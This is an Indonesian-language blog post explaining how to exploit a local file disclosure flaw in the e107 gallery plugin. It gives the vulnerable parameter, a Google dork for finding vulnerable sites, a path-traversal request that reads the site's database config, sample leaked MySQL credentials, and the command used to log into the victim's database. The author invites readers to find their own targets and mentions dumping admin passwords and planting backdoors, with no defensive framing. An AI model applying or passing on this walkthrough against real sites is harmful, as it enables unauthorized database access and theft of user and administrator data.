• Beranda
  • Autosultan
  • Bitcoin
  • Dollar
  • Linux
  • LOKER
  • Printer
  • Sofware
  • sosial
  • TISniper
  • Virus
  • Windows

T.I Sniper

#Expert Advisor for MetaTrader 4 #Expert Advisor for MetaTrader 5 #youtube #google #free dollar business every day #Lowongan #Pekerjaan #Loker #forex #trading Autopilot #mining crypto #Update #Tutorial #Komputer Perbaikan, #Email #Facebook , #whatsapp ,#instagram #telegram ,#Internet ,#Motivasi , #Crypto , #AirDrop, #Bitcoin, #Ethereum, #Binance coin, #Cardano, #Degocoin, #Litecoin #Indodax, #Coinbase, #Nexo Dan Mata Uang Digital Lain , #Website, Perbaikan #Server #Domain , #Hosting, #Whm

    • Beranda
    • Contact Forum
    • Coffee JKs88
    • Tentang Kami
    • Parse Code Html
    • Text Terbalik
    • Privacy Policy

    Ikuti Kami!

    Follow Akun Instagram Kami Dapatkan Notifikasi Terbaru!
    Ikuti Kami di Facebok! Untuk mendapatkan notifikasi terbaru.

    Postingan Populer

    Backlink dengan Google Dork Seo

    Dork Seo
    Januari 01, 2016
    0

    Cara Dapat Backlink dengan Google Dork

    Dork Seo
    Februari 13, 2016
    0

    Download File ISO Windows 11 Dan Bootable USB Rufus

    Sofware Windows
    Desember 02, 2021
    0

    Cara Dapat Backlink Edu Gratis

    Seo
    Februari 13, 2016
    0

    SBS opening Fix Autosultan

    Autosultan zonamotivasi
    Januari 25, 2022
    0
    Author
    chmood
    Tautan disalin ke papan klip!
    Share Posts "e107 Gallery Local File Disclosure (LFD) Exploitation"
  • Salin link
  • Simpan Ke Daftar Bacaan
  • Bagikan ke Facebook
  • Bagikan ke Twitter
  • Bagikan ke Pinterest
  • Bagikan ke Telegram
  • Bagikan ke Whatsapp
  • Bagikan ke Tumblr
  • Bagikan ke Line
  • Bagikan ke Email
  • HomeExploitationse107 Gallery Local File Disclosure (LFD) Exploitation
    e107 Gallery Local File Disclosure (LFD) Exploitation

    e107 Gallery Local File Disclosure (LFD) Exploitation

    Simpan Postingan

    e107 Gallery Local File Disclosure (LFD) Exploitation

    Bug ini beberapa bulan lebih tua dari pada bug e107 yg lagi gencar2nya, yaitu Remote Code Execution pada contact form. But, saya akan mencoba menjelaskan bagaimana qt mengexploitasi bug LFD pada e107 gallery dan mendapatkan akses Remote Mysql.
    Iyap, remote mysql. Saya akan menjelaskan bagaimana qt bisa masuk ke mysql server pada host sasaran dengan memanfaatkan bug LFD pada e107 gallery.
    Banyak hal yg bisa qt peroleh dari sini mengakses database mysql nya. Misalnya ambil username dan password administrator, dumping email, backdooring, dll. saya g akan bagaimana melakukan itu semua, tapi saya akan menjelaskan bagaimana masuk ke sql srvernya.

    Lets Action!

    Seperti teknik exploitasi LFD biasanya. Hampir sama dengan LFI. bedanya di teknik ini, code yg di include tidak di eksekusi, namun di tampilkan. tekniknya sama persis seperti LFI.


    bug.php?var=../../../../../../path/to/file/want/to/include

    Bug LFD pada e107 gallery ini adalah: e107_plugins/my_gallery/image.php?file=

    googling aja buat dapetin site yg vuln. pake dork /e107_plugins/ /my_gallery/ dll sesuai kreatifitas km.

    Seperti yg saya katakan tadi, saya akan masuk ke mysql server pada host sasaran. Tentunya host sasaran yg vuln dengan bug ini.

    Untuk dapat masuk ke mysql server, yg q butuhkan adalah hostname, username, dan password mysql pada host sasaran. Dengan bug LFD pada e107 gallery, saya akan mengambil config mysql nya.

    http://ini.sasaran.com/e107_plugins/my_gallery/image.php?file=../../e107_config.php

    dari situ, saya mendapatkan output image kosong. what? kosong? iya. itu kalau di lihat dengan mata telanjang. tapi setelah menyingkap tabir misteri source code nya, qt mendapatkan file e107_config.php

    ------- snip ---------
    mySQLserver = 'mysql.sasaran.com';
    mySQLuser = 'sasaran_usersql';
    mySQLpassword = '357mnsss2';
    mySQLdefaultdb = 'mdbase';
    -------- snip ---------

    yap, itulah yg tak butuhin. sekarang udah dapet. langkah terakhir adalah mengambil akses ke tuh mysql server. banyak cara untuk melakukanya. dengan membuat database connection dengan php, akses phpmyadmin, remote mysql server, dll. dalam contoh ini saya akan melakukan remote mysql server.

    Untuk melakukan remote mysql, yg q butuhkan jelas aplikasi mysql. Untuk pengguna windows, bisa pakai mysql standart seperti yg satu paket ama phptriad, xampp, appserv, dkk. sedangkan command nya sama aja.

    Key. Langsung aja konek ke mysql nya.

    [array@silk array]$ mysql -h mysql.sasaran.com -u sasaran_usersql -p357mnss2 mdbase

    Tunggu terkoneksi. SEtelah masuk command line, qt bisa langsung melakukan command2 mysql. Ambil data, dll. Pengetahuan tentang command mysql sangat penting disini.

    Sory neh g ada live demo nya, soalnya sedang g cari target. Cari ndiri ya. Selamat mencoba.


    Spesial Thanks: NoGe c0li Jack

    -ArRay-
    Exploitations
    September 23, 2015 • 0 komentar
    Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.
    Isi dari komentar adalah tanggung jawab dari pengirim. T.I Sniper mempunyai hak untuk tidak memperlihatkan komentar yang tidak etis atau kasar. Jika ada komentar yang melanggar aturan ini, tolong dilaporkan.

    T.I Sniper

    Your description here

    • Follow
    • Autosultan
    • Wa Admin Bisnis
    Copyright ©2010 - 2022 🔥 T.I Sniper.
    • Beranda
    • Cari
    • Posting
    • Trending
    • Tersimpan